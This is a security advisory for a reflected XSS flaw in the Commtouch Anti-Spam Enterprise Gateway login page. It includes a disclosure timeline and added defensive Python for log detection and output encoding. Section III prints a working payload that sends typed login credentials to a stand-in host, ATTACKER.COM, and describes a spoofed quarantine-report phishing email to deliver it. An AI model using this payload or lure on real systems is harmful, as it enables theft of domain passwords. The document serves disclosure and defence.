<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
        {font-family:Tahoma;
        panose-1:2 11 6 4 3 5 4 4 2 4;}
@font-face
        {font-family:Verdana;
        panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0in;
        margin-bottom:.0001pt;
        text-align:right;
        direction:rtl;
        unicode-bidi:embed;
        font-size:12.0pt;
        font-family:"Times New Roman";}
a:link, span.MsoHyperlink
        {color:blue;
        text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
        {color:purple;
        text-decoration:underline;}
span.EmailStyle17
        {mso-style-type:personal-compose;
        font-family:Arial;
        color:windowtext;}
span.a1
        {color:green;}
@page Section1
        {size:595.3pt 841.9pt;
        margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
        {page:Section1;}
/* List Definitions */
@list l0
        {mso-list-id:1401446426;
        mso-list-type:hybrid;
        mso-list-template-ids:-867282020 67698705 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
@list l0:level1
        {mso-level-text:"%1\)";
        mso-level-tab-stop:.5in;
        mso-level-number-position:left;
        text-indent:-.25in;}
ol
        {margin-bottom:0in;}
ul
        {margin-bottom:0in;}
-->
</style>
<!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple>
<div class=Section1 dir=RTL>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Commtouch
Anti-Spam Enterprise Gateway Cross Site Scripting (allowing domain credential theft)<br>
<br>
I. INTRODUCTION<br>
<br>
Commtouch Anti-Spam Enterprise Gateway is an anti-spam solution that protects enterprise
networks from the ever-increasing volume of spam email. The solution includes a
web application console which lets enterprise users check the blocked
messages, release messages, apply blocking rules and more.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
For more Information please refer to:<br>
</span></font><span class=a1><font size=2 color=green face=Arial><span
style='font-size:10.0pt;font-family:Arial'><a href="http://www.commtouch.com/">www.<b><span
style='font-weight:bold'>commtouch</span></b>.com</a></span></font></span><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
<br>
II. DESCRIPTION<br>
<br>
A reflected XSS vulnerability was discovered by Erez Metula in the product's
login page. It enables an attacker to steal a victim's credentials to the corporate
network. Since the login credentials are usually the victim's domain credentials,
this is a high-risk vulnerability that puts the passwords of the whole domain
at risk.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Apart
from being used as a regular reflected XSS attack vector, for example by sending
a malicious link to the user, there is another attack vector that can be used
which derives from the specific way the product works.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The
product sends a periodic email report to the user, listing the emails that were
identified as spam and were blocked. The user is given an option to release /
approve the mail, by clicking on the corresponding link.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Clicking
on the link brings the login page, in which the user enters his domain
credentials in order to access the web application and commit the action.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>If
an attacker sends a fake link that pretends to come from the product and
contains the XSS link inside it, the user can easily be enticed to supply his
credentials in order to access the product console.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'> <br>
<br>
III. EXPLOITATION<br>
<br>
<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>As
explained above, exploitation can be achieved by traditional XSS methods by
utilizing the following pattern:<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&amp;LoginType=1&amp;PARAMS=XXX"&gt;&lt;SCRIPT&gt;PAYLOAD
&lt;/SCRIPT&gt;&lt;input%20type="hidden"%20name="XXX"%20value="X<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>More
interesting is a specific exploitation tied to the product behavior, in which
an attacker will fake the "My Quarantine Report" coming from the
product.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Steps:<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:
-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span
style='mso-list:Ignore'>1)<font size=1 face="Times New Roman"><span
style='font:7.0pt "Times New Roman"'> </span></font></span></span></font><![endif]><span
dir=LTR><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:
Verdana'>Setting up a credential stealing page at http://ATTACKER.COM/stealer<o:p></o:p></span></font></span></p>
<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:
-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span
style='mso-list:Ignore'>2)<font size=1 face="Times New Roman"><span
style='font:7.0pt "Times New Roman"'> </span></font></span></span></font><![endif]><span
dir=LTR><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:
Verdana'>Building a fake "My Quarantine Report" email containing some
enticing "release me" message.<o:p></o:p></span></font></span></p>
<p class=MsoNormal dir=LTR style='margin-left:.5in;text-align:left;text-indent:
-.25in;mso-list:l0 level1 lfo1;direction:ltr;unicode-bidi:embed'><![if !supportLists]><font
size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><span
style='mso-list:Ignore'>3)<font size=1 face="Times New Roman"><span
style='font:7.0pt "Times New Roman"'> </span></font></span></span></font><![endif]><span
dir=LTR><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:
Verdana'>Replacing the links contained in the mail with:<o:p></o:p></span></font></span></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'>http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&amp;LoginType=1&amp;DIRECTTO=3&amp;PARAMS=XXX"&gt;&lt;script&gt;function
SendCredentials(){ img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid="
+ document.forms[0].LoginName.value + "&amp;password=" + document.forms[0].LoginPass.value;}
function HandleSubmit(){ document.forms[0].onsubmit= SendCredentials; } window.onload
= HandleSubmit;&lt;/script&gt;&lt;input%20type="hidden"%20name="Params2"%20value="x<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='margin-left:.25in;text-align:left;direction:
ltr;unicode-bidi:embed'><font size=1 face=Verdana><span style='font-size:9.0pt;
font-family:Verdana'>4) Sending the fake email, pretending to be from the Commtouch
service.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'> <br>
IV. IMPACT<br>
<br>
Since the login credentials are usually the victim's domain credentials,
this is a high-risk vulnerability that puts the passwords of the whole domain at risk.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
<br>
V. DETECTION<br>
<br>
Detection of this vulnerability involves injecting HTML tags or scripts into the
"PARAMS" parameter of the login page and checking whether they are reflected unencoded.<o:p></o:p></span></font></p>
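<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>On the defensive side, the same injection point can be watched for in the web server logs. The following is an added example and not part of the advisory or the vendor's product: it scans constructed IIS-style W3C log lines for requests to the login.asp path named above whose PARAMS value, once URL-decoded, carries markup characters. The log layout, the sample lines and the marker regex are assumptions; only the path and the PARAMS parameter name come from the advisory.</span></font></p>

```python
import re
from urllib.parse import parse_qsl, unquote

# Path of the vulnerable login page, as given in the advisory.
LOGIN_PATH = "/AntiSpamGateway/UPM/English/login/login.asp"
# Characters a legitimate PARAMS token should never need; '"' and '>' are what
# the advisory's pattern uses to break out of the hidden input's attribute.
MARKUP_RE = re.compile(r'[<>"]|javascript:', re.IGNORECASE)

# Constructed sample log in IIS W3C layout (date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status). Line 2 carries the advisory's pattern, URL-encoded as a
# browser would send it; line 4 carries a double-encoded bare tag; the rest are benign.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-01-03 10:15:01 192.0.2.10 GET /AntiSpamGateway/UPM/English/login/login.asp LoginName=alice&LoginType=1&PARAMS=abc123 200
2007-01-03 10:16:44 192.0.2.77 GET /AntiSpamGateway/UPM/English/login/login.asp LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX%22%3E%3CSCRIPT%3EPAYLOAD%3C/SCRIPT%3E 200
2007-01-03 10:17:02 192.0.2.10 GET /AntiSpamGateway/UPM/Images/logo.gif - 200
2007-01-03 10:18:30 192.0.2.88 GET /AntiSpamGateway/UPM/English/login/login.asp LoginName=bob&LoginType=1&PARAMS=%253CSCRIPT%253E 200
"""


def parse_line(line):
    """Split one W3C log line into a dict; return None for directives or blank lines."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 7:
        return None
    date, time, client, method, stem, query, status = fields[:7]
    return {"when": f"{date} {time}", "client": client, "method": method,
            "stem": stem, "query": "" if query == "-" else query, "status": status}


def suspicious_params(query):
    """Return the decoded PARAMS values that contain markup, or [] if the request is clean."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() != "params":
            continue
        value = unquote(value)  # second pass catches double-encoded values
        if MARKUP_RE.search(value):
            hits.append(value)
    return hits


def scan_log(text):
    """Return (timestamp, client, decoded PARAMS) for each login.asp request carrying markup."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None or entry["stem"].lower() != LOGIN_PATH.lower():
            continue
        for hit in suspicious_params(entry["query"]):
            alerts.append((entry["when"], entry["client"], hit))
    return alerts


if __name__ == "__main__":
    for when, client, value in scan_log(SAMPLE_LOG):
        print(f"{when} {client} PARAMS={value!r}")
```

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Run against the sample, the scanner reports the two requests from 192.0.2.77 and 192.0.2.88 and ignores the benign login and the image fetch. Matching on the decoded value rather than the raw query string is what keeps the rule from being sidestepped by percent-encoding, which is why the code decodes twice.</span></font></p>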
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
VI. WORKAROUND<br>
<br>
Although originally reported for version V4 in 2006, the problem was not solved
even in version V5.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>There
is no official solution yet.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The
only workaround possible is to blacklist HTML / SCRIPT tags, which can be
bypassed relatively easily and is not considered a very good solution.<o:p></o:p></span></font></p>
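<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>The difference between that workaround and a real fix is easiest to see in code. The following is an added example, not the vendor's code: it reflects a PARAMS value into a hidden form field the way the advisory's URL pattern implies the login page does, first with the tag blacklist described above and then with allowlist validation plus HTML attribute encoding. The field layout, the allowlist regex and the helper names are assumptions; the reflected pattern is the one from section III.</span></font></p>

```python
import html
import re

# The reflected value from the advisory's section III pattern (PARAMS=...).
ADVISORY_PATTERN = 'XXX"><SCRIPT>PAYLOAD</SCRIPT><input type="hidden" name="XXX" value="X'

# Blacklist workaround named in the advisory: strip script tags, reflect the rest raw.
SCRIPT_TAG_RE = re.compile(r"</?script[^>]*>", re.IGNORECASE)
# Assumed allowlist: a legitimate PARAMS token is treated as an opaque short id.
PARAMS_ALLOWED_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_params(value):
    """Allowlist check run before the value is used at all."""
    return bool(PARAMS_ALLOWED_RE.match(value))


def encode_for_attribute(value):
    """Encode for a double-quoted HTML attribute: &, <, >, " and ' become entities."""
    return html.escape(value, quote=True)


def render_hidden_field(params, policy):
    """Render the hidden input the login page echoes PARAMS into (assumed layout)."""
    if policy == "blacklist":
        reflected = SCRIPT_TAG_RE.sub("", params)
    elif policy == "encode":
        reflected = encode_for_attribute(params)
    else:
        raise ValueError(f"unknown policy {policy!r}")
    return f'<input type="hidden" name="PARAMS" value="{reflected}">'


def count_tags(markup):
    """Number of tags a browser would parse; a safe reflection yields exactly one."""
    return len(re.findall(r"<[A-Za-z/][^>]*>", markup))


if __name__ == "__main__":
    for policy in ("blacklist", "encode"):
        out = render_hidden_field(ADVISORY_PATTERN, policy)
        print(f"{policy:9s} tags={count_tags(out)} {out}")
    print("allowlist accepts abc123:", validate_params("abc123"))
    print("allowlist accepts pattern:", validate_params(ADVISORY_PATTERN))
```

<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>With the blacklist, the SCRIPT tag is gone but the quote and angle bracket that close the value attribute are still reflected, so the browser still sees a second injected element; the attribute context is broken regardless of which tag names are filtered. With attribute encoding, every structural character becomes an entity and the page parses back to the single hidden input, and the allowlist rejects the value before it is ever echoed. The fix is the encoding at the output point, not a list of forbidden tags.</span></font></p>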
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
VII. VENDOR RESPONSE<br>
<br>
Commtouch was informed on 7/12/06 by e-mail to their support.<br>
Commtouch had not fixed the problem at the time of publication.<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><o:p> </o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'> <br>
VIII. DISCLOSURE TIMELINE<br>
<br>
<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>26/12/06 Identification
of the flaw<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>27/12/06
Reporting the flaw to Commtouch
by email<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>28/06/06
Response from Commtouch,
asking for more description <o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>03/01/07 Providing
the full description to Commtouch<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>22/01/07 Commtouch
acknowledgement of the vulnerability<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>22/01/07 Commtouch
response: delivery time for a patch unknown<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>27/01/07 Commtouch
was notified about full disclosure of this information to the public<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>26/06/08 Release
of this information, after neither a patch nor a fix appeared in the version V5 release<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
IX. CREDITS<br>
<br>
The vulnerability was discovered by <o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'><br>
Erez Metula, CISSP <br>
Application Security Department Manager<o:p></o:p></span></font></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Academic
Director, 2BAcademy</span></font><b><font size=2 color=purple face=Tahoma><span
lang=HE dir=RTL style='font-size:10.0pt;font-family:Tahoma;color:purple;
font-weight:bold'><o:p></o:p></span></font></b></p>
<p class=MsoNormal dir=LTR style='text-align:left;direction:ltr;unicode-bidi:
embed'><font size=1 face=Verdana><span style='font-size:9.0pt;font-family:Verdana'>Security Software
Engineer<br>
E-Mail: erezmetula@2bsecure.co.il</span></font><font size=2 face=Arial><span
style='font-size:10.0pt;font-family:Arial'><o:p></o:p></span></font></p>
<p class=MsoNormal dir=RTL><font size=3 face="Times New Roman"><span dir=LTR
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
</div>
</body>
</html>